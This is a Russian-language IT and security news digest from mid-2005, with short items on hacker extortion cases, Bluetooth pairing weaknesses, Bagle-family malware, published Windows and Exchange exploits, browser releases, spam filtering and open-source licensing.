Руководитель следственного комитета при МВД России генерал-майор Валерий Сызранцев так говорит о современном хакерстве: “Цели у кибертеррористов бывают разные. Но в последнее время этот механизм все чаще начинает использоваться как инструмент вымогательства денежных средств”. С каждым годом мошенники выдумывают все более современные методы. Крадут пароли, номера кредитных карт, банковских счетов, секретную информацию. И конечно же, шантажируют “богатеньких Буратино”, угрожая взломом сайтов банков, крупных компаний, финансовых корпораций. Вымогательство с помощью компьютерных технологий во всем мире давно уже превратилось в особый “бизнес”. Хотя еще лет десять назад мало кто мог представить, что такое будет возможно. Впервые в России уголовная ответственность за преступления в сфере компьютерной информации была введена в 1997-м. К слову, тогда в стране было выявлено всего 17 преступлений такого рода. А в прошлом году, по данным МВД, зарегистрировано уже 13820 преступлений в сфере высоких технологий. Как сообщил старший уполномоченный управления “К” МВД России Антон Кузнецов, в России отмечается устойчивая тенденция объединения хакеров в группы, в том числе международные, для совершения крупномасштабных преступлений. Причем такие союзы носят ярковыраженные признаки организованных преступных групп. По словам генерала Сызранцева, в последнее время его ведомство занимается расследованием целого ряда крупных компьютерных преступлений. Одно из них россияне “раскручивают” совместно с англичанами. Началось с того, что год назад из Великобритании пришла просьба оказать помощь в разоблачении банды российских хакеров, терроризирующих целую группу английских букмекерских компаний. Их сайты регулярно подвергались беспощадным хакерским атакам. Особенно интенсивно - перед главными скачками, когда делаются самые большие ставки. В результате работа этих компаний была практически полностью заблокирована. За прекращение атак компьютерные пираты требовали, чтобы жертвы перечисляли на указанные ими счета по 40-50 тысяч долларов. Российские борцы с компьютерной преступностью уважили просьбу английских коллег. И вышли на след пяти злоумышленников. Двое из них арестованы, к остальным применили иные меры пресечения. По этому делу обыски проводились в Москве, Санкт-Петербурге и в Балакове Саратовской области. Самое любопытное, что все пятеро ранее даже не были знакомы друг с другом. Повстречались в виртуальном пространстве, договорились о киберналетах и атаковали чужие компьютерные системы. Сейчас они знакомятся с материалами уголовного дела и вскоре должны предстать перед судом.
Более подробно

5/06/2005 09:28 План выхода Mozilla Firefox 2.0
Бен Гуджер (Ben Goodger) опубликовал план выпуска второй major-версии — 2.0 — открытого web-браузера Mozilla Firefox. Судя по графику релизов, однако, пока трудно говорить о каких-то конкретных сроках — только если о том, что Firefox 2.0 можно ожидать к 2006 году. Вторая альфа-версия Firefox 1.1 (Deer Park Alpha 2) появится в июне 2005 года, за ней последует Deer Park Beta (Firefox 1.1b, 2005 год), затем финальный релиз Deer Park (Firefox 1.1, 2005 год) с новым движком Gecko 1.8 (предыдущие версии Deer Park основываются на бета-релизах Gecko 1.8). В 2006 году выйдет Firefox 1.5 под кодовым названием «The Ocho», а затем и долгожданный Firefox 2.0.
Nixp.Ru

5/06/2005 09:08 Атака на BlueTooth
Израильские ученые нашли способ атаки на вроде бы защищенные BT-устройства, сообщает bugtraq.ru. За последние годы было уже найдено множество способов атаки на BT, однако большинство из них требовало ослабленных настроек безопасности. Год назад специалисты @Stake уже продемонстрировали способ атаки защищенных устройств в процессе установки первоначального соединения, или "спаривания" (pairing). Процесс этот включает ввод пин-кода на обоих устройствах, на основе которого формируется ключ инициализации, после обмена которым формируется 128-битный ключ связи (link key). Далее в их взаимодействие уже не могут вмешаться другие устройства, а ключ инициализации из дальнейшего обмена данными устраняется. Проблема в том, что именно в момент обмена ключом инициализации его можно перехватить (пересылается он не в открытом виде, но процедура его восстановления не слишком сложная) и, зная алгоритм его формирования, простым перебором получить исходный пин-код. Спецификация BlueTooth допускает длину пин-кода от 8 до 128 битов, однако в большинстве устройств используется 4-значный десятичный код, подбираемый на современных компьютерах за сотые доли секунды. Ну а от получения пин-кода всего один шаг до получения полного контроля над устройством. До сих пор эта атака не воспринималась как слишком опасная, поскольку процесс спаривания устройств производится только при первом сеансе связи, т.е. не слишком часто. Однако выяснилось, что можно очень легко по желанию взломщика повторно инициировать этот обмен, прикинувшись одним из этих устройств, которое посылает сообщение о том, что оно "забыло" ключ связи. Все, что для этого требуется - определить персональный идентификатор подделываемого устройства, что проделывается элементарно, поскольку все BT-устройства и так рассылают его всем вокруг. Любопытно, кстати, что на первый взгляд более безопасный режим работы, при котором пин-код не сохраняется в BT-устройстве, а вводится при каждом соединении вручную, на практике оказывается гораздо более уязвимым.
Подробности

4/06/2005 20:17 Выход Opera 8.01
Вышла новая версия одного из самых популярных браузеров - Opera 8.01. Список изменений пока не доступен на официальном сайте, но полагается, что исправлена серьёзная ошибка, приводившая к падению браузера при переходе по некоторым ссылкам, сообщает linux.org.ru.
Версия для Windows

4/06/2005 18:44 В Израиле "накрыта" крупная сеть компьютеров-шпионов
Полиция Израиля «накрыла» масштабную сеть компьютерного шпионажа, жертвами которого могли стать ведущие компании по всему миру. В расследование, помимо израильтян, вовлечены Интерпол и правоохранительные органы западных стран. Расследование, которое продолжалось несколько месяцев, показало, что в компьютеры нескольких крупнейших израильских компаний был запущен вирус-шпион. «Беспрецедентный скандал в области промышленного шпионажа», — так прокомментировала произошедшее израильская газета «Хаарец». Полиция только сейчас начинает осознавать, сколько ведущих компаний в Израиле и, возможно, за его пределами стали жертвой троянского вируса, задачей которого был сбор данных. Как заявляют правоохранительные органы, вирус был обнаружен в компьютерах операторов мобильных сетей, телевизионных компаний и израильского автодилера, обладающего эксклюзивными правами на ввоз автомобилей известных марок. Полиция считает, что злоумышленники — израильский компьютерщик, живущий в Великобритании, и несколько его помощников — написали вирус, а затем продали его группе посредников. Согласно этой версии, те передали программу нескольким компаниям, искавшим способы следить за конкурентами и за счет этого получать преимущества на рынке.
СNews

4/06/2005 13:52 В интернете распространяется набор "Сделай сам зомби"
В интернете распространяется набор «Сделай сам» для превращения обычного компьютера в машину-зомби, послушную воле хакера. Как заявляют эксперты Computer Associates, набор включает вариант вируса Bagle и три других вида вредоносного кода. Один из них, под названием Glieder, загружает еще две программы, содержащиеся в наборе, — «троян» Fantibag, отключающий соединения с антивирусными сайтами, и другой «троян», Mitglieder, отключающий антивирусные программы, брандмауэры и открывающий «черный ход». Glieder является своего рода координатором действий других составных частей набора. По мнению экспертов СА, хакерский набор отличается сложностью и продуманностью исполнения.
Источник

4/06/2005 13:39 Антивирусное администрирование через Internet
Компания Panda Software выпустила новую версию Panda WebAdmin - антивирусного решения, предоставляющего управление на базе Web. WebAdmin предоставляет защиту не только от вирусов, червей и троянцев, но также от всех видов Internet-угроз, таких как шпионское, рекламное ПО, дозвонщики и хакерские утилиты. Пакет Panda WebAdmin содержит антивирусный клиент, локально инсталлируемый на компьютеры и инновационную централизованную систему управления, размещенную Panda Software в Internet, с которой администраторы могут удаленно внедрять, настраивать и наблюдать за антивирусной защитой компании. Фундаментальным принципом управления утилитами безопасности через Panda WebAdmin является тот факт, что компьютеры подключаются к Internet, а не соединяются через корпоративную сеть. Это значит, что администратор WebAdmin может наблюдать за работой антивирусов на удаленных компьютерах, не являющихся частью корпоративной сети, например ноутбуках или компьютерах в удаленных офисах (филиалах), тем самым понижая затраты, связанные с обслуживанием ИТ-защиты. Кроме того, технология Panda WebAdmin позволяет устанавливать различные политики защиты и назначать определенную конфигурацию группам компьютеров. Группы же определяются для адаптации к защитным нуждам и организационной структуре компании.
Panda Software

4/06/2005 12:26 Индустрия звукозаписи добилась закрытия музыкального сайта Weblisten.com
Звукозаписывающая индустрия одержала очередную победу - после нескольких лет судебных преследований закрыт испанский музыкальный сайт Weblisten.com. Ресурс был запущен в 1997 году и предлагал подписчикам неограниченное количество песен для скачивания за ежемесячную плату в 40 долларов США, сообщает CNET News. Разрешение продавать музыкальные треки от крупных звукозаписывающих лейблов компания получила от испанских агентств, выдающих лицензии. Западные и американские студии звукозаписи не согласились с таким решением и потратили годы на судебные тяжбы с Weblisten.com. На этой неделе портал потерпел поражение. Объявление на четырех языках извещает посетителей сайта о том, что он прекратил свою работу. Международная федерация производителей фонограмм (IFPI) сообщает, что Weblisten.com в суде признал свою вину. Стоит заметить, что пока индустрия звукозаписи борется с подобными музыкальными сайтами с переменным успехом. Так, недавно был закрыт еще один испанский портал под названием Puretunes, после того как музыкальные лейблы инициировали против него судебную тяжбу. А российский сайт AllofMP3.com, распространяющий за скромную плату (2 цента за 1 Мб) обширный диапазон музыкальных композиций, оказался IFPI не по зубам и продолжает работать.
"Компьюлента"

4/06/2005 12:04 На МКС обновили программное обеспечение
Экипаж МКС обновил математическое программное обеспечение на центральном бортовом компьютере станции. "Сначала из Центра управления полетами в компьютеры МКС передали по каналам радиосвязи новое программное обеспечение, а затем командир экипажа Сергей Крикалев проверил, как она работает, подключив свой портативный компьютер к Центральному посту в Служебном модуле", - сообщил представитель NASA. Такая операция, по его словам, проводится регулярно по мере постановки новых задач. Предыдущее обновления программного обеспечения станции было осуществлено 21 июля 2004 года с диска доставленного на борт 27 мая рейсом космического грузовика "Прогресс-М49". Тогда для проверки установленного программного обеспечения бортовые компьютеры были перезагружены, сообщает РИА "Новости".
РИА "Новости"

4/06/2005 11:30 Пользователи критикуют политику Microsoft
Microsoft навлекла на себя критику, подтвердив, что следующая версия Internet Explorer не будет работать у пользователей операционной системы Windows 2000 (об этом сообщил в своём блоге один из сотрудников Microsoft - «Не надо удивляться отсутствию плана выпуска IE 7 для Windows 2000. Одна из причин — то место жизненного цикла Windows 2000, в котором мы находимся. Другая — некоторые средства защиты IE 7 опираются на функциональность операционной системы XP SP2, которую нелегко перенести в Windows 2000», — говорится в постинге). Хотя Windows 2000 будет поддерживаться до 2010 года, в конце июня этого года Microsoft перестанет принимать заявки на изменения или введение новых функций в эту операционную систему. Ряд читателей блога Microsoft высказывают недовольство этой новостью. Например, некто Гарри пишет, что это противоречит обещанию Microsoft поддерживать Windows 2000 до 2010 года. «Важный момент, насколько я понимаю, заключается в том, что Microsoft пообещала предоставить расширенную поддержку Windows 2000 до 2010 года. Я понимаю это как признание Microsoft того факта, что предприятия и потребители будут использовать Windows 2000 по крайней мере до этого срока, но вот наступит 2010 год, а они все еще будут работать с IE 6 SP1, который к тому времени безнадежно устареет». Microsoft критикуют и за веб-браузер, неспособный работать независимо от операционной системы. «Какая глупость — создавать незащищенный веб-браузер, который так тесно связан с мельчайшими деталями операционной системы, что его нельзя ни перенести на другую версию той же самой ОС, ни отделить от этой ОС», — говорится в одном постинге. IE 7, бета-версия которого должна выйти этим летом, предложит повышенную степень защиты и базовую поддержку браузинга во вкладках. Ожидается также, что в нем будет улучшена поддержка стандартов, включая CSS 2 и PNG transparencies.
Подробности

4/06/2005 10:38 Новый почтовый вирус заманивает пользователей сообщением о поимке бин Ладена
В Интернете распространяется очередной почтовый вирус, приходящий пользователям в виде письма, сообщающего получателям о поиске "главного международного террориста" Осамы бин Ладена. Как сообщает BBC News, письмо содержит сообщение о том, что бин Ладен пойман и призывает открыть вложение, якобы содержащее фотографии ареста террориста, однако после открытия приложенного файла происходит заражение компьютера обычным компьютерным вирусом. Антивирусными компаниями было обнаружено несколько разных версий письма - все они содержат модификацию ранее известной "троянской" программы Psyme, которая позволяет хакеру удаленно управлять зараженным компьютером и использовать его в своих целях (как правило, это дальнейшая рассылка вирусов, рассылка спама или организация распределенных атак).
BBC

4/06/2005 10:25 Взломан корейский сайт Microsoft Network
Компания Microsoft признала, что ее южнокорейское отделение ее информационной сети MSN (Microsoft Network) стало объектом взлома со стороны неустановленных сетевых злоумышленников. Как сообщает Associated Press, было установлено, что на этой неделе хакерам удалось проникнуть сквозь систему безопасности серверов, поддерживающих сайт www.msn.co.kr и встроить в главную страницу код, который позволял воровать логины и пароли зарегистрированных на сайте пользователей. Представитель Microsoft Адам Сон (Adam Sohn) выступил с заявлением на эту тему и особо отметил, что англоязычные сайты корпорации при взломе не пострадали. После обнаружения "трояна" с системе корейского сайта MSN он был удален, а меры безопасности усилены, ведется разбирательство. При этом стало известно, что корейский сайт данного подразделения Microsoft управляется не Microsoft, а сторонней компанией, которую представитель корпорации назвать отказался. Сон подчеркнул, что причиной взлома, вероятно, стала неоперативность сотрудников этой компании, которые не установили вовремя последние обновления ("заплатки") операционных систем от Microsoft, которые периодически выходят с целью устранить вновь найденные программные "дыры". Вероятно, одну из известных "дыр" и нашли в структуре корейского MSN хакеры, чем и воспользовались в злоумышленных целях.
Подробности

2/06/2005 15:36 Хакеры атаковали российских зернопромышленников
Вчера была атакована российская электронная площадка по торговле зерном IDK. Злоумышленники смогли ввести в систему множество некорректных данных, что привело к параличу расчетного ядра системы и временной неработоспособности серверов. Торговая площадка не функционировала в течение шести часов – c 10 до 16. В этот период на IDK была прекращена работа более 100 зерновых компаний. К моменту атаки общая сумма торгов на площадке достигла 420 млн. рублей ($1,5 млн.). В данный момент последствия данного происшествия устранены, закончены работы по предотвращению подобных инцидентов в будущем. Авторов атаки установить пока не удалось, но выяснение продолжается
CNews

2/06/2005 14:12 Германия готова судить автора Sasser
19-летний автор червей Sasser и NetSky Свен Яшан (Sven Jaschan) предстанет перед судом 5 июля в немецком городе Верден, сообщает сайт The Register. Для участия в процессе, дата начала которого была назначена на прошлой неделе, будут привлечены представители вещательной компании и властей трех городов Германии. Они будут представлять на суде потерпевшую сторону. Общее число истцов в рамках слушания о черве Sasser составляет 143 физических и юридических лица. Общий ущерб, понесенный этими лицами, достигает около 157 тысяч долларов. По мнению следствия, и количество истцов, и предварительная сумма ущерба — лишь малая часть последствий, которые действительно произошли в результате эпидемии Sasser. Свен Яшан заразил несколько тысяч компьютеров в мае 2004 года, используя уязвимость в операционной системе Windows. Компания Microsoft объявила награду за содействие в задержании автора Sasser. На объявление откликнулся знакомый Яшана, и вирусописатель был арестован. Впрочем, информатор сам стал подозреваемым в причастности к созданию Sasser и заявленной награды сразу не получил. Возможно, деньги дойдут до адресата после того, как суд вынесет Яшану приговор. Для жителей Германии Яшан на некоторое время стал предметом национальной гордости. В мае прошлого года журналисты ряда немецких СМИ не скрывали своего восхищения действиями вирусописателя, в короткие сроки заразившего несколько тысяч компьютеров. А 20 сентября 2004 года Свен Яшан был принят на работу в антивирусную компанию SecurePoint.
Источник

2/06/2005 13:54 Yahoo и Cisco — борцы со спамом
Производитель сетевого «железа» Cisco и интернет-портал Yahoo объединили усилия в борьбе со спамом. Компании намерены внедрять совместную разработку, позволяющую определять настоящего отправителя письма и его легитимность, передает Associated Press. ИА отмечает, что поддельный обратный адрес — это излюбленная тактика спамеров. Технология получила название DomainKeys Identified Mail и состоит из Domainkeys (разработка Yahoo) и Internet Identified Mail (разработка Cisco). Другие компании, в том числе Microsoft, продвигают другие антиспамовые технлогии.
Источник

2/06/2005 13:42 Создатель системы DNS получил награду
Пол Мокапетрис (Paul Mockapetris), 22 года назад создавший систему DNS, награжден премией ACM Sigcomm. Впервые представленная публике в 1989 году, премия ACM Sigcomm вручается людям, "внесшим исключительный вклад" в развитие технологий передачи данных и компьютерных коммуникаций. Пол Мокапетрис, как пишет BBC, создал в 1983 году систему Domain Name Service, содержащую данные обо всех подключенных к интернету устройствах.
Источник

2/06/2005 12:59 В Шотландии строят суперкомпьютер с изменяемой конфигурацией
Сотрудники Центра параллельных вычислений Эдинбургского университета (Шотландия) намерены создать экспериментальный суперкомпьютер с изменяемой архитектурой. В основу вычислительного комплекса будут положены перепрограммируемые логические интегральные схемы (FPGA). В отличие от применяющихся в настоящее время процессоров с "жесткой" архитектурой, конфигурацию FPGA можно менять, используя специализированные программные средства. Это позволяет адаптировать систему для решения конкретного типа задач. Как сообщает New Scientist, шотландские ученые, проводящие исследования под руководством Марка Парсона, намерены объединить 64 вычислительных модуля FPGA с целью создания суперкомпьютера с производительностью в один терафлопс (триллион операций с плавающей запятой в секунду). Конечно, по сравнению с рекордсменом IBM Blue Gene/L, способным выполнять более 135 триллионов операций с плавающей запятой в секунду, это не так уж много. Однако преимущество нового вычислительного комплекса заключается несколько в другом. Дело в том, что экспериментальная система теоретически должна потреблять лишь около одного процента энергии, требуемой обычному суперкомпьютеру с тем же быстродействием. Кроме того, размеры прототипа будут сопоставимы с габаритами четырех настольных ПК, тогда как современные суперкомпьютеры занимают отдельные помещения. Впрочем, использование вычислительных комплексов на базе FPGA на практике, вероятно, начнется не скоро. Проблема заключается в том, что такие системы очень сложно программировать. Ведь, помимо решения самой задачи, необходимо организовать еще и внутреннюю архитектуру суперкомпьютера.
Источник

2/06/2005 12:33 Офисные форматы Microsoft станут открытыми
Как было заявлено сегодня, семейство форматов документов OpenXML, являющееся основой MS Office 12, будет полностью документированным и свободным от лицензионных отчислений для сторонних разработчиков.
Подробности

2/06/2005 12:08 По Интернету быстро распространяется очередная версия вируса Bagle
Антивирусные компании сообщили о быстром распространении в Интернете эпидемии очередной модификации известного вируса Bagle (по классификации "Лаборатории Касперского" - Email-Worm.Win32.Bagle.bo). Вирус приходит на пользовательские компьютеры в виде пустого письма с вложенным файлом, маскирующимся под zip-архив. При его открытии происходит заражение - вирус внедряется в систему и загружает дополнительный компонент с одного из серверов, список которых содержится в его теле, и рассылает свои копии по всем найденным на зараженном компьютере адресам, сообщает BBC News. Дополнительный компонент размещен на многих серверах по всему миру и позволяет превратить зараженный компьютер в "зомби", способного выполнить набор стандартных хакерских задач - рассылку спама, других вирусов, организацию распределенных атак. Это традиционная схема, применяемая для построения хакерских сетей (botnets), которыми сетевые злоумышленники могут управлять для реализации своих задач. Серверы, где размещен вирусный модуль, находятся в разных местах планеты - вероятно, модуль был помещен на них в результате взлома. В индустриально развитых странах держатели таких серверов, как правило, быстро принимают меры и удаляют вредоносные компоненты, однако в развивающихся странах на "бесхозных" серверах меры могут приниматься долго, или вообще не приниматься - это позволяет вирусу распространяться далее.
Подробность

1/06/2005 15:48 Ещё один эксплоит уязвимости Windows
Аргентиская группа Argeniss опубликовала эксплоит уязвимости COM-структуры в ОС семейства Wondows. Уязвимость было опубликована и устранена в бюллетене Microsoft MS05-12. Работа проверена в Win2k sp4, WinXP sp2, Win2k3 sp0. Исходный код предназначен для компиляции в win32. Эта же группа предлагает и эксплоиты за очень приличные деньги (в исходнике есть адрес страницы этих эксплоитов). Так, локальный эксплоит для Windows 2000 (MS05-018) предлагается (отдельному пользователю) за 200 американских рублей.
Эксплоит

1/06/2005 15:32 Антишпионский софт удаляет не всех шпионов
Утилиты, предназначенные для удаления из системы spyware, способны распознать далеко не все шпионские программы. Дело в том, что некоторые производители шпионского ПО, такие как Claria и WhenU, подали в суд на производителей антишпионских утилит с целью исключить их программы из списка опасных и подлежащих удалению. К сожалению, производители утилит поддались давлению и пошли на поводу у распространителей spyware. При этом, как сообщает PCWorld, обычному пользователю крайне сложно узнать, какие именно spyware-программы были пропущены при сканировании системы. Ибо у антишпионских программ нет права даже упомянуть о том, что в системе есть программа, ранее присутствовавшая в списке опасных, но затем удаленная.
Источник

1/06/2005 14:40 Проект открытой безопасной ОС получил инвестиции
Британская компания воспользуется шестизначной суммой, выделенной для разработки безопасной операционной системы для настольных ПК на базе Linux. Netproject объявила во вторник о том, что Министерство торговли и индустрии (DTI) выделило 132 тысячи фунтов стерлингов на ее программу Secure Open Source Desktop. Деньги были предоставлены членами клуба netproject «Incubator Club» — группы компаний и государственных учреждений, желающих финансировать проекты Open Source приватно, без привлечения внимания со стороны крупных производителей программного обеспечения. По словам Эдди Близдейла (Eddie Bleasdale), директора netproject, Secure Open Source Desktop подходит для организаций, желающих обеспечить надежные вычисления через центральную систему управления. ПК с запущенным Secure Open Source Desktop не могут регулироваться пользователями — все основное программное обеспечение закачивается, как только клиент впервые подключается к сети. Управление дальнейшими обновлениями ПО осуществляется удаленно и многие данные хранятся на центральных серверах, а не клиентских машинах.
Nixp.Ru

1/06/2005 13:53 Эксплоит уязвимости Microsoft Exchange 2000
Опубликован скрипт на Перл, использующий уязвимость, обнаруженную в Microsoft Exchange 2000 (описана и отпатчена в MS05-021). Уязвимость связана с переполнением кучи в X-LINK2STATE. Работа эксплоита проверялась на Windows 2000 Server SP4 EN с Microsoft Exchange 2000 SP3.
Эксплоит

1/06/2005 13:39 IT-менеджеры готовы покупать антивирусы Microsoft
70 процентов IT-менеджеров американских компаний готовы рассмотреть идею о приобретении лицензии на антивирусные программы Microsoft. Таковы результаты исследования, проведенного компанией Forrester Research по заказу инвестиционного банка Credit Suisse First Boston LLC, сообщает Security Pipeline. Заинтересованность IT-менеджеров в антивирусных программах Microsoft приводит в изумление консультанта компании Yankee Group Джима Слэби (Jim Slaby), ссылающегося на проблемы в системах безопасности Windows и Internet Explorer. «Покупать защитные программы у Microsoft — все равно, что покупать лекарства у врача, проигравшего судебный процесс за плохое лечение», — полагает Слэби. Среди респондентов, готовых приобрести антивирусные программы Microsoft, около четверти отмечают агрессивную ценовую политику компании. Часть IT-менеджеров признает, что не намеревается ориентироваться только на цену при выборе антивирусного вендора. «Прежде всего программа должна работать, а потом мы будем говорить о цене. Вы не захотите платить хорошую цену за заурядный продукт», — заявил представитель некоммерческой организации Goodwill Industries.
viruslist

1/06/2005 13:14 В Internet Explorer найдены новые дыры
В браузере Microsoft Internet Explorer последних версий обнаружены две уязвимости, используя которые злоумышленник теоретически может спровоцировать аварийное завершение работы приложения. Одна из дыр, как сообщает датская компания Secunia, связана с ошибкой переполнения буфера, возникающей в одном из компонентов браузера при обработке функции window()". Брешь присутствует в Internet Explorer шестой версии, причем атакам подвержены даже пользователи компьютеров с операционной системой Windows ХР и вторым сервис-паком. Заплатки для дыры в настоящее время не существует. Еще одна уязвимость выявлена в модуле Urlmon.dll браузера. Для реализации нападения злоумышленнику необходимо вынудить пользователя добавить в зону ограничений (restricted zone) веб-сайт с составленным определенным образом URL. Адрес такого ресурса должен начинаться с цифр, разделенных точками (по аналогии с IP-адресом), и заканчиваться последовательностью букв. В качестве примера приводится строка "4.3.2.1btf-errorreporting.btf.de". Данная дыра также может быть задействована на полностью пропатченных компьютерах с операционной системой Windows ХР SP2 и браузером Internet Explorer шестой версий. Способов устранения этой уязвимости на текущий момент также не существует.
Источник

1/06/2005 13:01 DSL станет быстрее
Международный союз по электросвязи утвердил новый стандарт цифровых абонентских линий DSL - VDSL2 (Very High Bit Rate DSL 2), который обеспечивает скорость передачи данных по стандартной телефонной линии в обоих направлениях до 100 Мбит/c. Для сравнения: у обычного DSL пропускная способность в несколько раз меньше. Особенностью VDSL2 является увеличение пропускной способности с сокращением протяженности медной линии: при длине в 1,5 км скорость передачи данных составляет около 12 Мбит/c, что примерно соответствует возможностям ADSL2. При длине же линии, на порядок меньшей, VDSL2 обеспечивает скорость от 80 до 100 Мбит/c. Американские провайдеры, планирующие развертывание инфраструктуры VDSL2, собираются подводить оптоволоконные кабеля к домам абонентов, чтобы средняя длина медных сегментов не превышала 80 м - таким образом большинство пользователей сервиса получит пропускную способность от 50 до 100 Мбит/c.
Источник

1/06/2005 12:39 ИТ-гигантов обвиняют в эксплуатации движения open-source
Высокопоставленный чиновник Европейской комиссии выступил с критикой нескольких крупных американских ИТ-фирм, обвиняя их в эксплуатации сообщества open-source. Джесус Вилласанте, глава отдела программного обеспечения при Генеральном директорате по информационному сообществу и медиа Европейской комиссии, утверждает, что крупные компании, такие как IBM, HP и Sun, просто используют сообщество open-source в качестве субподрядчика, вместо того, чтобы поощрять разработку независимых коммерческих продуктов. «IBM спрашивает заказчика: „Вам нужно проприетарное или открытое ПО?” Затем (если заказчик выбирает открытое ПО) она говорит: „ОК, значит, вам нужен open-source от IBM”. Всякий раз это open-source от IBM, или Sun, или НР», — пояснил Вилласанте, выступая на круглом столе конференции Holland Open Software в Амстердаме. «Компании просто используют потенциал сообществ — сегодня сообщество open-source является субподрядчиком американских транснациональных корпораций», — добавил он, призвав сообщество open-source добиваться большей независимости от крупных компаний. «Сообщество open-source должно воспринимать себя всерьез и сознавать, какую пользу оно приносит себе и обществу. Осознав, что это часть движущих сил общества, и попытавшись повлиять на эту часть, мы будем двигаться в правильном направлении».
Подробности

1/06/2005 12:14 Появились подробности о новом ПО веб-сервера Microsoft
Следующая версия веб-сервера Microsoft Internet Information Services (IIS7) будет содержать инструменты разработки ASP.NET, и многие из ее основных функций перейдут в опциональные модули. Кроме того, полностью переработаны инструменты администрирования сервера с целью повышения уровня безопасности и расширения возможностей администратора. По мере того как Microsoft предоставляет своим ключевым партнерам доступ к предварительным версиям IIS7, который планируется выпустить в 2006 году вместе с новой версией Windows с кодовым названием Longhorn, становится известно все больше деталей о капитальном обновлении веб-сервера. Одним из тех, кто опубликовал свои впечатления в собственном блоге , стал Роберт Маклаус, президент и главный архитектор ПО компании-разработчика программного обеспечения .Net Interscape Technologies. Он признается, что видел IIS7 на прошлогоднем саммите Microsoft, но менеджер группы программистов Билл Стейплз только теперь позволил ему рассказать об этом публично. По его словам, процесс унификации привел к тому, что в IIS7 будут введены многие концепции ASP.NET, такие как HTTP-конвейеры, модули и файлы конфигурации XML. Кроме того, создание модулей из функций IIS уменьшит объем кода, одновременно исполняемого в системе, что приведет к минимизации размера объекта для хакерских атак. «С точки зрения безопасности в IIS открывается совершенно новый мир», — пишет Маклаус.
Подробнее

31/05/2005 22:04 GPL v3 может появиться раньше, чем ожидалось
Следующая версия популярной open source лицензии GPL может появиться раньше, чем ожидалось. Новая лицензия должна решить проблему использования софтверных патентов. О планах относительно третьей версии GPL (General Public License) рассказал ее основной автор и главный юридический консультант организации Free Software Foundation Эбен Моглен (Eben Moglen) на прошедшей конференции LinuxWorld. По его словам, в области лицензирования open source грядут большие изменения. Первый черновик GNU General Public License 3 будет опубликован в интернете в самое ближайшее время. В текст лицензии будут включены пункты о том, как защищать GPL-софт с помощью софтверных патентов. Предложения будут вынесены на всеобщее обсуждение, а окончательный вариант войдет в итоговый текст GPL 3.
Nixp.Ru

31/05/2005 13:07 С безопасностью — порядок, с пользователями — нет
Сисадмины высоко оценивают технический уровень защиты персональных компьютеров, дата-центров и удаленного доступа. Самая большая угроза для безопасности систем — это сами пользователи. Именно пользователи, из-за своей низкой квалификации и совершаемых ошибок являются основной угрозой для безопасности компании. К такому выводу пришли исследователи из аналитической компании Amplitude Research, проведя в апреле 2005 г. опрос среди 280 специалистов по безопасности сетей, системных администраторов и прочих технических специалистов. Около 70% специалистов выражают удовлетворенность текущим уровнем защищенности дата-центров и серверов. У тех, кто выражает озабоченность, основной причиной головной боли является «несоблюдение внутренних правил безопасности» (40%), то есть безалаберность пользователей. Другие причины для беспокойства — недостаточный бюджет или недостаточное время для необходимого тренинга (28%) и «отсутствие мандата со стороны топ-менеджмента» (23%), что означает отсутствие полномочий на осуществление необходимых действий. Опрос показал, что в целом сисадмины выражают весьма высокую удовлетворенность уровнем защищенности дата-центров и персональных компьютеров, а гораздо большее беспокойство у них вызывают беспроводные сети, мобильные устройства, ноутбуки и физическая безопасность, то есть возможность несанкционированного доступа в рабочие помещения.
"Вебпланета"

31/05/2005 12:07 Спам-фильтры не выдерживают полевых испытаний
Рабочая группа Проекта "АнтиСпам" опубликовала предварительную версию отчета о результатах тестирования российских спам-фильтров в реальных условиях "Спам-фильтрация: полевые испытания", сообщает bugtraq.ru. Была исследована эффективность фильтрации спама фильтрами "Спамооборона", используемым в почтовой системе Яндекса, и "Спамтест", используемым в почтовой системе Mail.ru. Согласно предварительным выводам авторов отчета, автоматическая фильтрация электронной почты может привести как к пропуску спама, так и к удалению легитимных писем. Авторы также отмечают, что на использованном для исследования массиве сообщений электронной почты "Спамооборона" показала преимущество перед "Спамтестом". Однако, Яндексу следует доработать свою систему в части фильтрации сообщений на английском языке. Основной вывод, сделанный координатором Проекта "АнтиСпам" Евгением Альтовским, заключается в том, что самые тщательные настройки спам-фильтров помогают лишь частично решить проблему спама, не устраняя необходимости ручного разбора корреспонденции. Окончательная и более подробная версия отчета будет опубликована осенью 2005 года.
Отчёт

31/05/2005 11:49 Уязвимость в SoftICE
Piotr Bania cообщает о наличии уязвимости в популярном в "определённых" кругах ПО SoftICE, наличие которой позволяет локальному пользователю вызвать DoS системы. Связана с ошибкой в драйвере DbgMsg.sys, который загружен в память при установленном SoftICE. Для эксплуатации уязвимости необходимо сформировать специальный вызов "int 2dh" с некорректным указателем отладочного сообщения (invalid debug message pointer). Уязвимость подтверждена в DriverStudio версий 3.1 и 3.2.
Описание

31/05/2005 11:03 Евросоюз лидирует по количеству ботнетов
Страны Европейского союза лидируют по количеству компьютеров, используемых хакерами для рассылки спама и проведения DDoS-атак. К такому выводу пришли специалисты компании CipherTrust, сообщает сайт vnunet.com. По информации CipherTrust, в мае на долю Евросоюза пришлось 26 процентов всех зараженных компьютеров (ботнетов). На долю США пришлось 20 процентов ботнетов, на долю Китая — 15 процентов. Для того, чтобы отслеживать активность зараженных систем, CipherTrust создала интерактивную карту, предоставляющую детальную информацию об активности хакеров в разных мировых регионах. «Запуск "Зомбиметра" (ZombieMeter) подтверждает нашу приверженность идее сделать информацию о зараженных машинах доступной для пользователей электронной почты. Изучая глобальную активность отправителей сообщений и определяя шаблоны их поведения, мы можем и дальше обеспечивать упреждающую защиту от подобных угроз», — заявил представитель CipherTrust. Лидером Евросоюза по числу ботнетов оказалась Германия — на ее долю приходится шесть процентов зараженных машин. Среднемесячный прирост компьютеров в ботнетах за май составил 172 тысячи.
Источник

31/05/2005 10:43 IBM Anonymous Resolution: решение для анонимизации секретов
